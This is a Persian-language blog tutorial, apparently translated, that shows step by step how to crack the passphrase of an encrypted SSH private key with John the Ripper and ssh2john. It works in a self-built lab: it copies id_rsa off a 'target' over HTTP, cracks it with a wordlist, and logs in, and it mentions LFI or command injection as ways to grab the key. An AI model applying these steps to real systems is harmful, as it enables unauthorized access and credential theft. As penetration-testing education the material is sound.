آموزش تصویری هک SSH با نرم‌افزار “John The Ripper”

john the ripper app

آموزش رمزگشایی رمز عبورهای کلید خصوصی”SSH (private key)” با برنامه‌‌ی جان ریپر “John the Ripper”

پروتکل پوسته ایمن (SSH) یکی از رایج ترین پروتکل‌های شبکه است که معمولا برای مدیریت از راه دور دستگاه‌ها به‌واسطه اتصال رمزنگاری شده استفاده ‌‌‌می‌شود. با این حال، SSH ‌‌‌می‌تواند در معرض حمله‌‌ی بروت فورس قرار گیرد. احراز هویت مبتنی بر کلید بسیار امن‌‌‌تر است و حتی ‌‌‌می‌توان کلیدهای خصوصی را برای امنیت بیشتر رمزنگاری کرد. اما حتی این کار نیز کاملا مانع آسیب پذیری آن نمی‌شود زیرا با استفاده از برنامه‌‌ “جان ریپر” می‌توان رمز عبورهای کلید خصوصی SSH را کرک کرد.

احراز هویت مبتنی بر کلید SSH

احراز هویت مبتنی بر رمز عبور یک روش استاندارد اتصال به دستگاه از طریق SSH است. مزیت این روش این است که آسان‌‌‌تر انجام ‌‌‌می‌شود. اما به دلیل آن که ‌‌‌می‌تواند در معرض حملات brute-forcing و حدس زدن رمز قرار گیرد، از نظر امنیتی دچار مشکل است.
از طرف دیگر‌‌؛ احراز هویت مبتنی بر کلید، روش رمزنگاری را برای اطمینان از اتصالات ایمن استفاده ‌‌‌می‌کند. یک جفت کلید که از یک کلید عمومی و خصوصی ایجاد ‌‌‌شده، کلید خصوصی باید مخفی نگه داشته شود و برای اتصال به سیستم‌هایی که کلید عمومی منطبق دارند استفاده ‌‌‌می‌شود.

کلید عمومی برای رمزگذاری ارتباطات استفاده ‌‌‌می‌شود و فقط کلید خصوصی مرتبط ‌‌‌می‌تواند آن را رمزگشایی کند. این امر، تقریباً امکان این‌که هکرها “SSH sessions” را به خطر بیاندازند غیرممکن ‌‌‌می‌سازد، مگر اینکه آن‌ها به کلید خصوصی دسترسی داشته باشند.

مراحل زیر با فرض آن است که شما قبلاً از طریق دستگاه محلی خود به یک کامپیوتر هدف دسترسی پیدا کرده اید. من از “کالی لینوکس ” به عنوان سیستم محلی استفاده ‌‌‌می‌کنم.

مقاله زیر هم می‌تواند برای شما مناسب باشد:

یک کاربر جدید در رایانه‌‌ هدف ایجاد کنید

برای شروع‌‌، بیایید یک کاربر جدید در رایانه‌‌ هدف به منظور اجرای برنامه‌های نمایشی ایجاد کنیم. از دستور”adduser” استفاده کنید و یک رمز عبور جدید در پنجره‌‌ ظاهر شده وارد کنید:

target:~$ sudo adduser nullbyte

Adding user `nullbyte' ...
Adding new group `nullbyte' (1003) ...
Adding new user `nullbyte' (1003) with group `nullbyte' ...
Creating home directory `/home/nullbyte' ...
Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully

در مرحله بعد‌، صحت اطلاعات را تأیید کنید. اشکالی پیش نمی‌آید که همه چیز را خالی بگذارید:

Changing the user information for nullbyte
Enter the new value, or press ENTER for the default
        Full Name []:
        Room Number []:
        Work Phone []:
        Home Phone []:
        Other []:
Is the information correct? [y/N] y

با مشاهده‌‌ی” :/etc/passwd” ‌‌‌می‌توانیم اطمینان حاصل کنیم که کاربر جدید با موفقیت اضافه شده است:

target:~$ cat /etc/passwd  root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
nullbyte:x:1003:1003:,,,:/home/nullbyte:/bin/bash

اکنون ‌‌‌می‌توانیم با دستور “su” به کاربر جدید خود سوئیچ کنیم:

target:~$ su - nullbyte

Password:
nullbyte@target:~$

برای مشاهده‌ ویدئو این آموزش به پایین صفحه مراجعه کنید. 

یک جفت کلید بر روی سیستم هدف ایجاد کنید

کار بعدی که باید انجام دهیم تولید یک جفت کلید عمومی / خصوصی است. ابزار “ssh-keygen” ‌‌‌می‌تواند به راحتی این کار را برای ما انجام دهد. برای ایجاد فایل در فهرست شخصی خود از مسیر پیش فرض استفاده کنید.

 

nullbyte@target:~$ ssh-keygen

Generating public/private rsa key pair.
Enter file in which to save the key (/home/nullbyte/.ssh/id_rsa):
Created directory '/home/nullbyte/.ssh'.

‌‌‌می‌خواهیم کلید خصوصی رمزگذاری شود‌‌، بنابراین مطمئن شوید که یک رمز عبور را در پنجره وارد ‌‌‌می‌کنید (به منظور حفظ سادگی از رمز عبور abc123 استفاده خواهیم کرد):

Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/nullbyte/.ssh/id_rsa.
Your public key has been saved in /home/nullbyte/.ssh/id_rsa.pub.
The key fingerprint is:
1b:01:68:cc:ea:4f:8e:b5:08:72:17:50:32:1b:98:e6 nullbyte@target

اکنون ‌‌‌می‌توانیم آن را به دایرکتوری Hidden SSH تغییر دهیم:

nullbyte@target:~$ cd .ssh

و مطمئن شویم که کلیدهای ما آنجا هستند:

nullbyte@target:~/.ssh$ ls -la

total 16
drwx------ 2 nullbyte nullbyte 4096 2019-06-19 13:49 .
drwxr-xr-x 3 nullbyte nullbyte 4096 2019-06-19 13:46 ..
-rw------- 1 nullbyte nullbyte 1743 2019-06-19 13:49 id_rsa
-rw-r--r-- 1 nullbyte nullbyte  405 2019-06-19 13:49 id_rsa.pub

همچنین برای اطمینان از اینکه مجاز به اتصال از طریق دستگاه دیگر هستیم‌‌، باید یک فایل “authorized_key” را ایجاد کنیم:

nullbyte@target:~/.ssh$ touch authorized_keys


باید سطح دسترسی‌های مناسب را روی آن تنظیم شود تا اطمینان حاصل شود فقط کاربر ‌‌‌می‌تواند فایل را بخواند و بنویسد:

nullbyte@target:~/.ssh$ chmod 600 authorized_keys

کلید عمومی باید در این فایل قرار بگیرد‌‌، بنابراین آن را انتخاب کنید:

nullbyte@target:~/.ssh$ cat id_rsa.pub

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA7IATfm6Y2VDtlEkWNGLJ5r9z9euOD1mHcWeB4vCcY+9M+XTEkILb8gk0/0uaNrLfBgcrZi8Y15wIib8122KYfwVIxVn0kbp5sggo4ZZQ9AXAPsdXyP8iIhCdbu34QkEu+pdq1jjK2QKbJRhRt4woAKGXxpApGfWdbyDdElo001VjjmDIpUwKU695YlF98baOlxgUdtW+zhL8J2W6cABeQEO3pXaiu560mJxSfRX8J++5djHiwJ9LMQAVD8khrvYfmnExeT1CuhNcbxdD/kU64ccV0zhecUQgXR1zEY/tWVdJL8wWfUnHWza2BiYqCeEhIdKGlVLvPUx5LbihLUFdCw== nullbyte@target

آن را در فایل “authorized_keys” کپی کنید و مطمئن شوید که هیچ خطی نصفه نباشد یا فاصله اضافی وجود نداشته باشد‌‌:

nullbyte@target:~/.ssh$ nano authorized_keys

کلید خصوصی را وارد سیستم محلی کنید

در این مرحله‌‌، باید کلید خصوصی “id_rsa” را در سیستم Local خود وارد کنیم. این امر ‌‌‌می‌تواند از روش‌های مختلفی انجام شود، مانند دسترسی داشتن به “LFI”و یا “Command Injection” که به ما اجازه اجرا دستورات را می‌دهد. به منظور درک بهتر موضوع، از طریق Http اقدام می‌کنیم.

بررسی نسخه پایتون نصب شده در سیستم را فراموش نکنید:

 

nullbyte@target:~/.ssh$ which python

/usr/bin/python

‌‌‌با این دستورات می‌توانیم یک سرور سریع HTTP ایجاد کنیم:

nullbyte@target:~/.ssh$ python -m SimpleHTTPServer

Serving HTTP on 0.0.0.0 port 8000 ...

در سیستم Local خود ‌‌‌می‌توانیم از برنامه‌‌ی “wget” برای دریافت فایل استفاده کنیم:

~# wget http://10.10.0.50:8000/id_rsa

--2020-04-15 12:19:39--  http://10.10.0.50:8000/id_rsa
Connecting to 10.10.0.50:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1743 (1.7K) [application/octet-stream]
Saving to: ‘id_rsa’

id_rsa                                    100%[=====================================================================================>]   1.70K  --.-KB/s    in 0.001s

2020-04-15 12:19:49 (2.18 MB/s) - ‘id_rsa’ saved [1743/1743]
/

و محتوای آن را تأیید کنید:

~# cat id_rsa

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9A447029ABFAC605

WiRuWyOFt8x+eCwBIbRdhpa8pm1YIuBIC1Od73vslxlIcYYkSz8AqCr8k/sus6uY
JHHO6KXjkJCpH/okU9bWGPzQf1cj2jWFf/y7EOSmd1e7RbIA8xWYcAWKPhnvwgnu
z+d6SFSYyj4rkKUvqloclKCblp6M5sCza0YksTzmEJZz/tHWRwHGRG31TvJHiqxQ
n9FpriG5MqZoegcYJgvt+z9rrPNf/jaZZb9ulYwxRn+5nCbWqBilu/Mh5knN608c
uW2UyIlyJ2BpyYrOgqadTkMgIwrwERrbU6LmgVtZXCc6/cACdMwdu6gv17MtfOlM
ytzEZ66aa98EFrFfuFX2LgoOBpi4nAAo3yZ7ISWpWnbnPFzhT89gBAdruh8fo5X4
07gAajsTiJrCW2nZSqBFx4BTAqYP7IcvDv2iAUEg6bfqC2bqpIfjYYcLuy0+YQv4
7uNH9jpT+ZfOY6VK4oG1p+1ieOVothNxcoj0+StUL5i5dQYoW9te8z8+qqswAE9S
aobSSQAUvdNh07XH0TXg+QTsiJGLNMaWmwMBw50WkzJOwN759zuk2b1LbHTpsgbQ
AngfcMfoHOvlhnHZNSbCeDB9SzQwkhLnQ6CktQaQaa5AY/E2ll+/W0Dmr4QEhk7e
z30FE3QqZU7fqxx7esXTMm8z6lvhQNSWRRxsg48rHub+Mq739T+Yi7xK4C9SCzwe
7BYDqp2ekinCf+5OKf3UObNo5Cugb3viapDKHyWulH+dXdxSkLUsgzDoFdFz0H3m
wvc8Qfn0JoVWFxwd1J3B32ZcEIneeGyotrODz5bRmqLv/T7mdM/HRASdonTROEPn
G+Mv65R+MRiAhRIIZO3a8J8eSAzq3AVBuq+gbLabnNvGY2N7KSQ3OBV4XSDYS43R
HuRz2u1GI+sXOr7ZXoQeKbl9qoymRvpppf5kI5IrQBoHGF92GGVLBGJOBg9M/YNc
mLNm9lz2Y+9LmHU6lgq51a7ZfViVFvj+Us63DoSgdyHvC2oj2zWPOFf9Dm4r8aCO
bFS2BFb7UvBd/G2GxnYFKygTHZhPmZ2y/5fBBF5IA/rbQdE5SqC2MJmB0oOgB07v
csqQ5tX8guIxOnh/KHocR/B8Fwf90shrOWoVC0kqGZJN5PrepzPCvoMcJLknC0Q8
eUinaZ0r3UCv7z0gjlz66qWERIMlUczBnLALRf4nVkfP3NHrLinZooGnOh7pkXpm
mg2qTXWnJ+vwfEDb4M0DYOFKa/AxO2wWsCuvc7ZJYvZL2HSWNVl6fRcFTWbrbIr/
ajTfjIclAonNYgGxoDAQKtSSolrNdOquemW79evgdAN/Jtbp5irV3bG0hTcJSIPp
kVBSXe3pslX6BUeOPl9KFT9CNxIjNFZkJ/gUxIV9LOIEcmHCB04iGVFl/KQA2FWD
27fOZbQPG/h4XC6Zm2iGU7ub0FNA2rId1ZRXlE04gYu5g/nmnAOlSbcqcN+xoMmh
L31FphscezkNda/Fw70+y/5buYGSs4tMsUKuiTkZsqSW9j3R9I/7KLHbpKX7fI7n
OURnUxXvDLoXihVQ9kTgTJM6d8pbHYuda4po2IvXWqdnbtHP7Ezz4A==
-----END RSA PRIVATE KEY-----


“SSH2John” را روی سیستم محلی نصب کنید

در صورت نصب نبودن نسخه‌‌ی “Jumbo” جان ریپر، باید ssh2john را از GitHub دریافت کنیم‌‌، زیرا این نسخه که در “کالی لینوکس” موجود است در نسخه جان ریپر نصب نشده. (اگر نسخه جان ریپر را نصب نکرده‌اید‌‌، ‌‌‌می‌توانید از نحوه نصب آن در its GitHub مطلع شوید).

~# wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/ssh2john.py

--2020-06-07 12:26:03--  https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/ssh2john.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 199.232.28.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|199.232.28.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7825 (7.6K) [text/plain]
Saving to: ‘ssh2john.py’

ssh2john.py                               100%[=====================================================================================>]   7.64K  --.-KB/s    in 0s

2020-06-07 12:26:04 (21.2 MB/s) - ‘ssh2john.py’ saved [7825/7825]

 

کلید خصوصی را روی سیستم محلی رمزگشایی کنید


تنها کاری که باید انجام شود رمزگشایی کلید خصوصی است سپس نتایج را با استفاده از ابزار پایتون “ssh2john” به یک فایل “Hash” جدید هدایت کنیم:

~# python ssh2john.py id_rsa > id_rsa.hash


سپس از برنامه‌‌ جان ریپر برای کرک کردن رمز عبور استفاده خواهیم کرد؛ اما ابتدا‌‌، به یک لیست کلمه مناسب نیاز داریم. به منظور حفظ سادگی از یک لیست کلمه کوتاه که شامل رمز عبور ماست استفاده خواهیم کرد. آن را از اینجا دریافت کنید:

~# wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/darkweb2017-top10.txt

--2020-06-07 12:30:54--  https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/darkweb2017-top10.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 199.232.28.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|199.232.28.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 81 [text/plain]
Saving to: ‘darkweb2017-top10.txt’

darkweb2017-top10.txt                     100%[=====================================================================================>]      81  --.-KB/s    in 0s

2020-06-07 12:30:55 (2.28 MB/s) - ‘darkweb2017-top10.txt’ saved [81/81]

حالا جان “ریپر” را مثل همیشه اجرا کنید و لیست کلمه و فایل “Hash” را به آن بدهید:

~# john --wordlist=darkweb2017-top10.txt id_rsa.hash

Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
abc123           (id_rsa)
1g 0:00:00:00 DONE (2020-06-07 12:32) 1.562g/s 15.62p/s 15.62c/s 15.62C/s 123456..123123
Session completed

‌‌‌می‌توانیم رمز عبور خود را شناسایی کنیم‌‌، اما برای اطمینان‌‌، بیایید از دستور “—show” استفاده کنیم تا صحت آن بررسی شود:

~# john --show id_rsa.hash

id_rsa:abc123

1 password hash cracked, 0 left

SSH را وارد سیستم هدف کنید

‌‌‌می‌توانیم SSH را با استفاده از دستور “–i” وارد سیستم هدف کنیم تا یک کلید خصوصی برای احراز هویت تعیین کنیم:

~# ssh -i id_rsa nullbyte@10.10.0.50

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
nullbyte@10.10.0.50's password:

و با یک خطا روبرو ‌‌‌می‌شویم. اگر سطح دسترسی‌ها خیلی باز باشد به ما اجازه‌‌ی استفاده از کلید را ‌‌نمی‌دهد‌‌، بنابراین تنها کاری که باید انجام دهیم این است که سطح دسترسی‌ها را محدودتر کنیم:

~# chmod 400 id_rsa

اکنون می توانیم متصل شویم. سپس‌‌، رمزعبور بازیابی شده را درپنجره وارد کنید و حالا وارد سیستم شده‌اید:

~# ssh -i id_rsa nullbyte@10.10.0.50

Enter passphrase for key 'id_rsa':
Linux 2.6.24-16-server #1 SMP Tue July 07 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Fri Jun 19 15:20:16 2020 from 10.10.0.1
nullbyte@target:~$

جمع بندی

در این آموزش با احراز هویت مبتنی بر کلید SSH و نحوه‌‌ی بازیابی رمز عبورهای کلید خصوصی آشنا شدیم. ابتدا‌‌، یک کاربر جدید در سیستم هدف ایجاد کردیم و یک جفت کلید SSH ایجاد کردیم. بعد‌‌، کلید خصوصی را از سیستم هدف به دست آوردیم و از ssh2john برای استخراج فایل Hash استفاده کردیم. سرانجام‌‌، رمزعبور کلید خصوصی را بازیابی کردیم و از آن برای اتصال به سیستم هدف استفاده کردیم.

مقاله زیر هم می‌تواند برای شما مناسب باشد:

علاقمند به حوزه امنیت اطلاعات و آشنا به حوزه تست نفوذ
  • facebook
  • twitter
  • googleplus
  • linkedIn
  • flickr

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *